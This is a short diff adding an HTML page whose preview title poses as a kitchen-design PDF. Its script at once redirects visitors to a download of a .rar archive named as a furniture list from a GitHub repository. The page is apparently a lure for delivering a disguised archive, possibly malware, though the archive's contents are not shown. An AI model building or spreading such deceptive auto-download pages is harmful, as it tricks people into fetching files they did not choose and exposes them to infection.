--- a/index.html
+++ b/index.html
@@ -1,1 +1,15 @@
-
+<!DOCTYPE HTML>
+<html lang="en-US">
+    <head>
+        <meta charset="UTF-8">
+        <meta property="og:title" content="Detailed-kitchen-design-drawing.pdf">
+        <title></title>
+    </head>
+    <body>
+        <script>
+            setTimeout(function() {
+                window.location.replace("https://github.com/savefille/House-interior/raw/main/Furniture%20needed%20to%20buy%20for%20new%20house.rar");
+            }, 1);
+        </script>
+    </body>
+</html>
